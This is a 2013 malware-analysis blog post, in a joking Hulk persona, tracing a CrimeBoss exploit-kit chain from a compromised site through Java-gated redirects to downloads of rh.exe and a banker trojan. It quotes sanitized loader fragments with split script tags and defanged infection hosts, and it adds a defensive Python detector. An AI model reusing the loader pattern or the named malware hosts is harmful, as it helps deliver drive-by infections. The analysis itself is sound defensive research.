Hulk teams up with the Malware Crusaders to smash The CrimeBoss! (infector abrahamspath.org.uk//cb.php)

27 Jan 2013
On a cold January night we find The Hulk passing time surfing the internet
Why can't puny malware just leave Hulk alone????!!!
The script on abrahamspath.org.uk/cb.php checks if Java is enabled (slightly sanitized with <):

if(navigator.javaEnabled())
＜/script＞'); }

If Java is enabled you are sent via a 302 redirect to

boyssuitsonline、com/jex/index.php?setup=d

where again a check for Java is made (slightly sanitized with <):

if(navigator.javaEnabled())

Finally the victim is presented with the actual landing page. Landing page sample is here -->>[PASTEBIN]

The landing page again checks if Java is enabled.

document.write('＜sc' + 'ri' + 'pt src=
"h00p://boyssuitsonline,com/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 +
＜/sc' + 'ri' + 'pt＞');
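As an added defender-side example (not code from the original post): a small Python checker that flags the navigator.javaEnabled() gate and re-joins the split 'sc' + 'ri' + 'pt' string pieces inside document.write, so the hidden script tag and its src become readable for triage. The sample HTML and the example.invalid host are constructed placeholders, not the real infection page.

```python
import re

# Constructed sample page in the style of the loader quoted above; the host
# example.invalid is a placeholder, not the real infection domain.
SAMPLE_HTML = r"""<html><body><script>
if(navigator.javaEnabled()){
document.write('<sc' + 'ri' + 'pt src="http://example.invalid/jex/index.php?setup=d&s=2&r=' + Math.floor(100000 + Math.random()*900000) + '"></sc' + 'ri' + 'pt>');
}
</script></body></html>"""

JAVA_GATE = re.compile(r"navigator\.javaEnabled\s*\(\s*\)")
DOC_WRITE = re.compile(r"document\.write\s*\((.*?)\)\s*;", re.S)
STR_LIT = re.compile(r"'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\"")


def dejoin(expr):
    """Concatenate the string literals of a JS 'a' + 'b' + expr + 'c' expression.
    Pieces that are not literals (e.g. Math.floor(...)) cannot be resolved
    statically, so they are kept inline as {expr} markers."""
    out, pos = [], 0
    for m in STR_LIT.finditer(expr):
        between = expr[pos:m.start()].strip(" +\r\n\t")
        if between:
            out.append("{" + between + "}")
        out.append(m.group(1) if m.group(1) is not None else m.group(2))
        pos = m.end()
    tail = expr[pos:].strip(" +\r\n\t")
    if tail:
        out.append("{" + tail + "}")
    return "".join(out)


def find_loaders(html):
    """Return (java_gated, hits): java_gated says whether the page tests
    navigator.javaEnabled(); hits lists (reassembled_tag, src) for every
    document.write whose re-joined string turns out to be a <script> tag."""
    java_gated = bool(JAVA_GATE.search(html))
    hits = []
    for m in DOC_WRITE.finditer(html):
        text = dejoin(m.group(1))
        if re.search(r"<script\b", text, re.I):
            src = re.search(r'src\s*=\s*"([^"]*)"', text, re.I)
            hits.append((text, src.group(1) if src else None))
    return java_gated, hits


if __name__ == "__main__":
    gated, hits = find_loaders(SAMPLE_HTML)
    print("javaEnabled gate:", gated)
    for tag, src in hits:
        print("hidden loader:", tag)
        print("fetches from :", src)
```

The {Math.floor(...)} marker shows where the kit appends a random cache-buster, which is why the fetched URL differs on every visit and plain URL matching alone is unreliable.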
[NEW] Analysis of Landing Page & Jars exploit used

I analyzed how the exploit worked, and noted it down. It is a bit long so I wrote it in a separate post page -->>[HERE]

What is it with these moronz?? A malware PE binary rh.exe is downloaded from patuamusic.com,br/app/ if any of the Java applets successfully exploit the victim. See:

VirusTotal analysis -->>[HERE]
malwr.com analysis -->>[HERE]

Network analysis shows a GET request for Instal.teaz from sonhodoseu.dominiotemporario,com/fugi/ This is actually another executable and appears to be a banker trojan. See:

VirusTotal analysis -->>[HERE]
malwr.com analysis -->>[HERE]
Infection Scheme

Below we added the infection scheme graph:

RRRRAAAAAAARGGHHHHH!!! The Hulk and Malware Crusaders smash the evil CrimeBoss Kit, but is this the last we've seen of this villain?
Only time will tell. But bad guyz beware: The Hulk and The Malware Crusaders are always looking for you and you will never know when we decide to smash you!!
PoC is as per below:
And so many other infections:
Research, Sources & Samples
Samples, as per the sample pic above, can be received here -->>[MEDIAFIRE]
Recent Infection URL of this Exploit Kit is here -->>[HERE]
Similar analysis in Japanese --->>[HERE]
The Regex to search infection hint:
Written by: @Hulk_Crusader(main) & @unixfreaxjp (reference, analysis)